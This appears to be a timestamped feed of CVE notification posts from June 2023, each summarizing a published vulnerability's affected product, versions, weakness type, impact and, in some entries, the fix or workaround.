| 2023-06-27 18:58:31 |
🚨 CVE-2022-39356Discourse is a platform for community discussion. Users who receive an invitation link that is not scoped to a single email address can enter any non-admin user's email and gain access to their account when accepting the invitation. All users should upgrade to the latest version. A workaround is temporarily disabling invitations with `SiteSetting.max_invites_per_day = 0` or scope them to individual email addresses.🎖@cveNotify |
|
| 2023-06-27 18:58:27 |
🚨 CVE-2022-39341OpenFGA is an authorization/permission engine. Versions prior to version 0.2.4 are vulnerable to authorization bypass under certain conditions. Users who have wildcard (`*`) defined on tupleset relations in their authorization model are vulnerable. Version 0.2.4 contains a patch for this issue.🎖@cveNotify |
|
| 2023-06-27 18:58:26 |
🚨 CVE-2023-34158Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.🎖@cveNotify |
|
| 2023-06-27 18:58:25 |
🚨 CVE-2023-34160Vulnerability of spoofing trustlists of Huawei desktop.Successful exploitation of this vulnerability can cause third-party apps to hide app icons on the desktop to prevent them from being uninstalled.🎖@cveNotify |
|
| 2023-06-27 18:58:21 |
🚨 CVE-2023-34161nappropriate authorization vulnerability in the SettingsProvider module.Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-06-27 18:58:20 |
🚨 CVE-2022-39340OpenFGA is an authorization/permission engine. Prior to version 0.2.4, the `streamed-list-objects` endpoint was not validating the authorization header, resulting in disclosure of objects in the store. Users `openfga/openfga` versions 0.2.3 and prior who are exposing the OpenFGA service to the internet are vulnerable. Version 0.2.4 contains a patch for this issue.🎖@cveNotify |
|
| 2023-06-27 18:58:19 |
🚨 CVE-2023-34162Version update determination vulnerability in the user profile module.Successful exploitation of this vulnerability may cause repeated HMS Core updates and cause services to fail.🎖@cveNotify |
|
| 2023-06-27 18:58:15 |
🚨 CVE-2022-39808Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-06-27 18:58:14 |
🚨 CVE-2023-34166Vulnerability of system restart triggered by abnormal callbacks passed to APIs.Successful exploitation of this vulnerability may cause the system to restart.🎖@cveNotify |
|
| 2023-06-27 18:58:13 |
🚨 CVE-2022-39805Due to lack of proper memory management, when a victim opens a manipulated Computer Graphics Metafile (.cgm, CgmTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-06-27 16:58:37 |
🚨 CVE-2022-4102The Royal Elementor Addons WordPress plugin before 1.3.56 does not have authorization and CSRF checks when deleting a template and does not ensure that the post to be deleted is a template. This could allow any authenticated users, such as subscribers, to delete arbitrary posts assuming they know the related slug.🎖@cveNotify |
|
| 2023-06-27 16:58:35 |
🚨 CVE-2023-34615An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.🎖@cveNotify |
|
| 2023-06-27 16:58:34 |
🚨 CVE-2022-4024The Registration Forms WordPress plugin before 3.8.1.3 does not have authorisation and CSRF when deleting users via an init action handler, allowing unauthenticated attackers to delete arbitrary users (along with their posts)🎖@cveNotify |
|
| 2023-06-27 16:58:32 |
🚨 CVE-2022-41195Due to lack of proper memory management, when a victim opens a manipulated EAAmiga Interchange File Format (.iff, 2d.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-06-27 16:58:31 |
🚨 CVE-2022-41198Due to lack of proper memory management, when a victim opens a manipulated SketchUp (.skp, SketchUp.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-06-27 16:58:30 |
🚨 CVE-2022-41196Due to lack of proper memory management, when a victim opens a manipulated VRML Worlds (.wrl, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-06-27 14:58:33 |
🚨 CVE-2023-2431A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This bug affects Kubelet.🎖@cveNotify |
|
| 2023-06-27 14:58:31 |
🚨 CVE-2023-2480Missing access permissions checks in M-Files Client before 23.5.12598.0 (excluding 23.2 SR2 and newer) allows elevation of privilege via UI extension applications🎖@cveNotify |
|
| 2023-06-27 14:58:29 |
🚨 CVE-2022-45143The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.🎖@cveNotify |
|
| 2023-06-27 14:58:28 |
🚨 CVE-2022-45378** UNSUPPPORTED WHEN ASSIGNED ** In the default configuration of Apache SOAP, an RPCRouterServlet is available without authentication. This gives an attacker the possibility to invoke methods on the classpath that meet certain criteria. Depending on what classes are available on the classpath this might even lead to arbitrary remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-27 14:58:27 |
🚨 CVE-2023-2811The AI ChatBot WordPress plugin before 4.5.6 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks to all admin when setting chatbot and all client when using chatbot🎖@cveNotify |
|
| 2023-06-27 14:58:26 |
🚨 CVE-2023-2805The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-27 14:58:24 |
🚨 CVE-2023-32220Milesight NCR/camera version 71.8.0.6-r5 allows authentication bypass through an unspecified method.🎖@cveNotify |
|
| 2023-06-27 14:58:23 |
🚨 CVE-2023-3208A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-27 14:58:21 |
🚨 CVE-2023-3206A vulnerability classified as problematic was found in Chengdu VEC40G 3.0. Affected by this vulnerability is an unknown functionality of the file /send_order.cgi?parameter=restart. The manipulation of the argument restart with the input reboot leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231229 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-27 14:58:20 |
🚨 CVE-2023-2779The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-27 14:58:19 |
🚨 CVE-2023-32387A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.4, macOS Big Sur 11.7.7, macOS Monterey 12.6.6. A remote attacker may be able to cause unexpected app termination or arbitrary code execution🎖@cveNotify |
|
| 2023-06-27 14:58:18 |
🚨 CVE-2023-34641KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10. This issue can allow attackers to open a file dialog box via the function window.print() which can then be used to open an unprivileged command prompt.🎖@cveNotify |
|
| 2023-06-27 14:58:16 |
🚨 CVE-2023-34642KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10. This issue can allow attackers to open a file dialog box via the function showDirectoryPicker() which can then be used to open an unprivileged command prompt.🎖@cveNotify |
|
| 2023-06-27 14:58:15 |
🚨 CVE-2023-35862libcoap 4.3.1 contains a buffer over-read via the function coap_parse_oscore_conf_mem at coap_oscore.c.🎖@cveNotify |
|
| 2023-06-27 14:58:14 |
🚨 CVE-2023-27992The pre-authentication command injection vulnerability in the Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C0, NAS540 firmware versions prior to V5.21(AATB.11)C0, and NAS542 firmware versions prior to V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request.🎖@cveNotify |
|
| 2023-06-27 14:58:13 |
🚨 CVE-2023-3316A NULL pointer dereference in TIFFClose() is caused by a failure to open an output file (non-existent path or a path that requires permissions like /dev/null) while specifying zones.🎖@cveNotify |
|
| 2023-06-27 12:58:24 |
🚨 CVE-2023-32385A denial-of-service issue was addressed with improved memory handling. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4. Opening a PDF file may lead to unexpected app termination🎖@cveNotify |
|
| 2023-06-27 12:58:23 |
🚨 CVE-2022-42792This issue was addressed with improved data protection. This issue is fixed in iOS 16.1 and iPadOS 16. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-06-27 12:58:22 |
🚨 CVE-2022-42860This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Monterey 12.6.1, macOS Big Sur 11.7.1, macOS Ventura 13. An app may be able to modify protected parts of the file system🎖@cveNotify |
|
| 2023-06-27 12:58:18 |
🚨 CVE-2022-46718A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.7.2 and iPadOS 15.7.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, macOS Monterey 12.6.2. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-06-27 12:58:17 |
🚨 CVE-2023-27930A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app may be able to execute arbitrary code with kernel privileges🎖@cveNotify |
|
| 2023-06-27 12:58:16 |
🚨 CVE-2023-27940The issue was addressed with additional permissions checks. This issue is fixed in macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, macOS Monterey 12.6.6. A sandboxed app may be able to observe system-wide network connections🎖@cveNotify |
|
| 2023-06-27 11:58:24 |
🚨 CVE-2022-48491Vulnerability of missing authentication on certain HUAWEI phones.Successful exploitation of this vulnerability can lead to ads and other windows to display at any time.🎖@cveNotify |
|
| 2023-06-27 11:58:23 |
🚨 CVE-2023-2751The Upload Resume WordPress plugin through 1.2.0 does not validate the captcha parameter when uploading a resume via the resume_upload_form shortcode, allowing unauthenticated visitors to upload arbitrary media files to the site.🎖@cveNotify |
|
| 2023-06-27 11:58:22 |
🚨 CVE-2023-2742The AI ChatBot WordPress plugin before 4.5.5 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-06-27 11:58:20 |
🚨 CVE-2023-2719The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the `id` parameter for an Agent in the REST API before using it in an SQL statement, leading to an SQL Injection exploitable by users with a role as low as Subscriber.🎖@cveNotify |
|
| 2023-06-27 11:58:19 |
🚨 CVE-2023-2684The File Renaming on Upload WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-27 11:58:18 |
🚨 CVE-2023-2600The Custom Base Terms WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-27 11:58:17 |
🚨 CVE-2023-2654The Conditional Menus WordPress plugin before 1.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-06-27 11:58:16 |
🚨 CVE-2023-2527The Integration for Contact Form 7 and Zoho CRM, Bigin WordPress plugin before 1.2.4 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-06-27 11:58:14 |
🚨 CVE-2023-2401The QuBot WordPress plugin before 1.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-06-27 05:59:22 |
🚨 CVE-2022-23724Use of static encryption key material allows forging an authentication token to other users within a tenant organization. MFA may be bypassed by redirecting an authentication flow to a target user. To exploit the vulnerability, must have compromised user credentials.🎖@cveNotify |
|
| 2023-06-27 05:59:21 |
🚨 CVE-2022-23620XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions AbstractSxExportURLFactoryActionHandler#processSx does not escape anything from SSX document references when serializing it on filesystem, it is possible to for the HTML export process to contain reference elements containing filesystem syntax like "../", "./". or "/" in general. The referenced elements are not properly escaped. This issue has been resolved in version 13.6-rc-1. This issue can be worked around by limiting or disabling document export.🎖@cveNotify |
|
| 2023-06-27 05:59:20 |
🚨 CVE-2022-45097Dell PowerScale OneFS 9.0.0.x-9.4.0.x contains an Incorrect User Management vulnerability. A low privileged network attacker could potentially exploit this vulnerability, leading to escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-06-27 05:59:19 |
🚨 CVE-2022-45143The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.🎖@cveNotify |
|
| 2023-06-27 05:59:18 |
🚨 CVE-2022-45378** UNSUPPPORTED WHEN ASSIGNED **In the default configuration of Apache SOAP, an RPCRouterServlet is available without authentication. This gives an attacker the possibility to invoke methods on the classpath that meet certain criteria. Depending on what classes are available on the classpath this might even lead to arbitrary remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-27 05:59:14 |
🚨 CVE-2022-23547PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. This issue is similar to GHSA-9pfh-r8x4-w26w. Possible buffer overread when parsing a certain STUN message. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as commit in the master branch.🎖@cveNotify |
|
| 2023-06-27 05:59:13 |
🚨 CVE-2022-23614Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-06-27 05:59:12 |
🚨 CVE-2022-23603iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-06-27 05:59:11 |
🚨 CVE-2023-29321Adobe Animate versions 22.0.9 (and earlier) and 23.0.1 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-06-27 05:59:07 |
🚨 CVE-2023-3195A stack-based buffer overflow issue was found in ImageMagick's coders/tiff.c. This flaw allows an attacker to trick the user into opening a specially crafted malicious tiff file, causing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-06-27 05:59:06 |
🚨 CVE-2023-24032In Zimbra Collaboration Suite through 9.0 and 8.8.15, an attacker (who has initial user access to a Zimbra server instance) can execute commands as root by passing one of JVM arguments, leading to local privilege escalation (LPE).🎖@cveNotify |
|
| 2023-06-27 05:59:05 |
🚨 CVE-2023-3371The User Registration plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'lock_content_form_handler' and 'display_password_form' function in versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to decrypt and view the password protected content.🎖@cveNotify |
|
| 2023-06-27 05:59:01 |
🚨 CVE-2023-3215Use after free in WebRTC in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-27 05:59:00 |
🚨 CVE-2023-3216Type confusion in V8 in Google Chrome prior to 114.0.5735.133 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-27 05:58:59 |
🚨 CVE-2023-34474A heap-based buffer overflow issue was discovered in ImageMagick's ReadTIM2ImageData() function in coders/tim2.c. A local attacker could trick the user in opening specially crafted file, triggering an out-of-bounds read error, allowing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-06-27 01:58:31 |
🚨 CVE-2023-32522A path traversal exists in a specific dll of Trend Micro Mobile Security (Enterprise) 9.8 SP5 which could allow an authenticated remote attacker to delete arbitrary files.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-06-27 01:58:30 |
🚨 CVE-2023-32523Affected versions of Trend Micro Mobile Security (Enterprise) 9.8 SP5 contain some widgets that would allow a remote user to bypass authentication and potentially chain with other vulnerabilities.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit these vulnerabilities.This is similar to, but not identical to CVE-2023-32524.🎖@cveNotify |
|
| 2023-06-27 01:58:29 |
🚨 CVE-2023-32525Trend Micro Mobile Security (Enterprise) 9.8 SP5 contains widget vulnerabilities that could allow a remote attacker to create arbitrary files on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32526.🎖@cveNotify |
|
| 2023-06-27 01:58:25 |
🚨 CVE-2023-32526Trend Micro Mobile Security (Enterprise) 9.8 SP5 contains widget vulnerabilities that could allow a remote attacker to create arbitrary files on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32525.🎖@cveNotify |
|
| 2023-06-27 01:58:24 |
🚨 CVE-2023-32528Trend Micro Mobile Security (Enterprise) 9.8 SP5 contains vulnerable .php files that could allow a remote attacker to execute arbitrary code on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32527.🎖@cveNotify |
|
| 2023-06-27 01:58:23 |
🚨 CVE-2023-32530Vulnerable modules of Trend Micro Apex Central (on-premise) contain vulnerabilities which would allow authenticated users to perform a SQL injection that could lead to remote code execution.Please note: an attacker must first obtain authentication on the target system in order to exploit these vulnerabilities.This is similar to, but not identical to CVE-2023-32529.🎖@cveNotify |
|
| 2023-06-27 01:58:19 |
🚨 CVE-2023-32531Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.This is similar to, but not identical to CVE-2023-32532 through 32535.🎖@cveNotify |
|
| 2023-06-27 01:58:18 |
🚨 CVE-2023-32534Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.This is similar to, but not identical to CVE-2023-32531 through 32535.🎖@cveNotify |
|
| 2023-06-27 01:58:17 |
🚨 CVE-2023-32533Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.This is similar to, but not identical to CVE-2023-32531 through 32535.🎖@cveNotify |
|
| 2023-06-27 01:58:14 |
🚨 CVE-2023-32552An Improper access control vulnerability in Trend Micro Apex One and Apex One as a Service could allow an unauthenticated user under certain circumstances to disclose sensitive information on agents.This is similar to, but not identical to CVE-2023-32553🎖@cveNotify |
|
| 2023-06-27 01:58:13 |
🚨 CVE-2023-32555A Time-of-Check Time-Of-Use vulnerability in the Trend Micro Apex One and Apex One as a Service agent could allow a local attacker to escalate privileges on affected installations.Please note: a local attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32554.🎖@cveNotify |
|
| 2023-06-27 01:58:12 |
🚨 CVE-2023-32537Affected versions Trend Micro Apex Central (on-premise) are vulnerable to potential authenticated reflected cross-site scripting (XSS) attacks due to user input validation and sanitization issues. Please note: an attacker must first obtain authentication to Apex Central on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32536.🎖@cveNotify |
|
| 2023-06-26 22:58:31 |
🚨 CVE-2023-34924H3C Magic B1STW B1STV100R012 was discovered to contain a stack overflow via the function SetAPInfoById. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request.🎖@cveNotify |
|
| 2023-06-26 22:58:30 |
🚨 CVE-2023-3420Type Confusion in V8 in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-26 22:58:29 |
🚨 CVE-2023-3422Use after free in Guest View in Google Chrome prior to 114.0.5735.198 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-26 22:58:25 |
🚨 CVE-2023-33176BigBlueButton is an open source virtual classroom designed to help teachers teach and learners learn. In affected versions are affected by a Server-Side Request Forgery (SSRF) vulnerability. In an `insertDocument` API request the user is able to supply a URL from which the presentation should be downloaded. This URL was being used without having been successfully validated first. An update to the `followRedirect` method in the `PresentationUrlDownloadService` has been made to validate all URLs to be used for presentation download. Two new properties `presentationDownloadSupportedProtocols` and `presentationDownloadBlockedHosts` have also been added to `bigbluebutton.properties` to allow administrators to define what protocols a URL must use and to explicitly define hosts that a presentation cannot be downloaded from. All URLs passed to `insertDocument` must conform to the requirements of the two previously mentioned properties. Additionally, these URLs must resolve to valid addresses, and these addresses must not be local or loopback addresses. There are no workarounds. Users are advised to upgrade to a patched version of BigBlueButton.🎖@cveNotify |
|
| 2023-06-26 22:58:24 |
🚨 CVE-2023-34422A valid, authenticated LXCA user with elevated privileges may be able to delete folders in the LXCA filesystem through a specifically crafted web API call due to insufficient input validation.🎖@cveNotify |
|
| 2023-06-26 22:58:23 |
🚨 CVE-2023-27082Cross Site Scripting (XSS) vulnerability in /admin.php in Pluck CMS 4.7.15 through 4.7.16-dev4 allows remote attackers to run arbitrary code via upload of crafted html file.🎖@cveNotify |
|
| 2023-06-26 22:58:19 |
🚨 CVE-2023-2992An unauthenticated denial of service vulnerability exists in the SMM v1, SMM v2, and FPC management web server which can be triggered under crafted conditions. Rebooting SMM or FPC will restore access to the management web server.🎖@cveNotify |
|
| 2023-06-26 22:58:18 |
🚨 CVE-2023-2993A valid, authenticated user with limited privileges may be able to use specifically crafted web management server API calls to execute a limited number of commands on SMM v1, SMM v2, and FPC that the user does not normally have sufficient privileges to execute.🎖@cveNotify |
|
| 2023-06-26 22:58:17 |
🚨 CVE-2023-34421A valid, authenticated LXCA user with elevated privileges may be able to replace filesystem data through a specifically crafted web API call due to insufficient input validation.🎖@cveNotify |
|
| 2023-06-26 22:58:13 |
🚨 CVE-2023-35930SpiceDB is an open source, Google Zanzibar-inspired, database system for creating and managing security-critical application permissions. Any user making a negative authorization decision based on the results of a `LookupResources` request with 1.22.0 is affected. For example, using `LookupResources` to find a list of resources to allow access to be okay: some subjects that should have access to a resource may not. But if using `LookupResources` to find a list of banned resources instead, then some users that shouldn't have access may. Generally, `LookupResources` is not and should not be to gate access in this way - that's what the `Check` API is for. Additionally, version 1.22.0 has included a warning about this bug since its initial release. Users are advised to upgrade to version 1.22.2. Users unable to upgrade should avoid using `LookupResources` for negative authorization decisions.🎖@cveNotify |
|
| 2023-06-26 22:58:12 |
🚨 CVE-2023-3113An unauthenticated XML external entity injection (XXE) vulnerability exists in LXCA's Common Information Model (CIM) server that could result in read-only access to specific files.🎖@cveNotify |
|
| 2023-06-26 22:58:11 |
🚨 CVE-2020-23065Cross Site Scripting vulnerabiltiy in eZ Systems AS eZPublish Platform v.5.4 and eZ Publish Legacy v.5.4 allows a remote authenticated attacker to execute arbitrary code via the video-js.swf.🎖@cveNotify |
|
| 2023-06-26 18:58:22 |
🚨 CVE-2023-36301Talend Data Catalog before 8.0-20230221 contain a directory traversal vulnerability in HeaderImageServlet.🎖@cveNotify |
|
| 2023-06-26 18:58:21 |
🚨 CVE-2023-34154Vulnerability of undefined permissions in HUAWEI VR screen projection.Successful exploitation of this vulnerability will cause third-party apps to create windows in an arbitrary way, consuming system resources.🎖@cveNotify |
|
| 2023-06-26 18:58:19 |
🚨 CVE-2023-34157Vulnerability of HwWatchHealth being hijacked.Successful exploitation of this vulnerability may cause repeated pop-up windows of the app.🎖@cveNotify |
|
| 2023-06-26 18:58:18 |
🚨 CVE-2021-40336A vulnerability exists in the http web interface where the web interface does not validate data in an HTTP header. This causes a possible HTTP response splitting, which if exploited could lead an attacker to channel down harmful code into the user’s web browser, such as to steal the session cookies. Thus, an attacker who successfully makes an MSM user who has already established a session to MSM web interface clicks a forged link to the MSM web interface, e.g., the link is sent per E-Mail, could trick the user into downloading malicious software onto his computer. This issue affects: Hitachi Energy MSM V2.2 and prior versions.🎖@cveNotify |
|
| 2023-06-26 18:58:16 |
🚨 CVE-2021-3433Invalid channel map in CONNECT_IND results to Deadlock. Zephyr versions >= v2.5.0 Improper Check or Handling of Exceptional Conditions (CWE-703). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3c2f-w4v6-qxrp🎖@cveNotify |
|
| 2023-06-26 18:58:15 |
🚨 CVE-2021-26637There is no account authentication and permission check logic in the firmware and existing apps of SiHAS's SGW-300, ACM-300, GCM-300, so unauthorized users can remotely control the device.🎖@cveNotify |
|
| 2023-06-26 16:58:19 |
🚨 CVE-2023-2827SAP Plant Connectivity - version 15.5 (PCo) or the Production Connector for SAP Digital Manufacturing - version 1.0, do not validate the signature of the JSON Web Token (JWT) in the HTTP request sent from SAP Digital Manufacturing. Therefore, unauthorized callers from the internal network could send service requests to PCo or the Production Connector, which could have an impact on the integrity of the integration with SAP Digital Manufacturing.🎖@cveNotify |
|
| 2023-06-26 16:58:18 |
🚨 CVE-2023-2778A denial-of-service vulnerability exists in Rockwell Automation FactoryTalk Transaction Manager. This vulnerability can be exploited by sending a modified packet to port 400. If exploited, the application could potentially crash or experience a high CPU or memory usage condition, causing intermittent application functionality issues. The application would need to be restarted to recover from the DoS.🎖@cveNotify |
|
| 2023-06-26 15:58:12 |
🚨 CVE-2023-36631** DISPUTED ** Lack of access control in wfc.exe in Malwarebytes Binisoft Windows Firewall Control 6.9.2.0 allows local unprivileged users to bypass Windows Firewall restrictions via the user interface's rules tab. NOTE: the vendor's perspective is "this is intended behavior as the application can be locked using a password."🎖@cveNotify |
|
| 2023-06-26 05:58:13 |
🚨 CVE-2023-30300An issue in the component hang.wasm of WebAssembly 1.0 causes an infinite loop.🎖@cveNotify |
|
| 2023-06-26 05:58:12 |
🚨 CVE-2023-36662The TechTime User Management components for Atlassian products allow stored XSS on the Bulk User Actions page. This affects User Management for Jira 2.0.0 through 2.17.1, User Management for Confluence 2.0.0 through 2.15.24, and User Management for Bitbucket 2.2.2 through 2.15.24.🎖@cveNotify |
|
| 2023-06-26 05:58:11 |
🚨 CVE-2023-36675An issue was discovered in MediaWiki before 1.35.11, 1.36.x through 1.38.x before 1.38.7, 1.39.x before 1.39.4, and 1.40.x before 1.40.1. BlockLogFormatter.php in BlockLogFormatter allows XSS in the partial blocks feature.🎖@cveNotify |
|
| 2023-06-26 00:58:15 |
🚨 CVE-2023-36661Shibboleth XMLTooling before 3.2.4, as used in OpenSAML and Shibboleth Service Provider, allows SSRF via a crafted KeyInfo element. (This is fixed in, for example, Shibboleth Service Provider 3.4.1.3 on Windows.)🎖@cveNotify |
|
| 2023-06-26 00:58:14 |
🚨 CVE-2023-36666INEX IXP-Manager before 6.3.1 allows XSS. list-preamble.foil.php, page-header-preamble.foil.php, edit-form.foil.php, page-header-preamble.foil.php, overview.foil.php, cust.foil.php, and view.foil.php may be affected.🎖@cveNotify |
|
| 2023-06-26 00:58:13 |
🚨 CVE-2023-36660The OCB feature in libnettle in Nettle 3.9 before 3.9.1 allows memory corruption.🎖@cveNotify |
|
| 2023-06-26 00:58:12 |
🚨 CVE-2023-36664Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).🎖@cveNotify |
|
| 2023-06-25 22:58:12 |
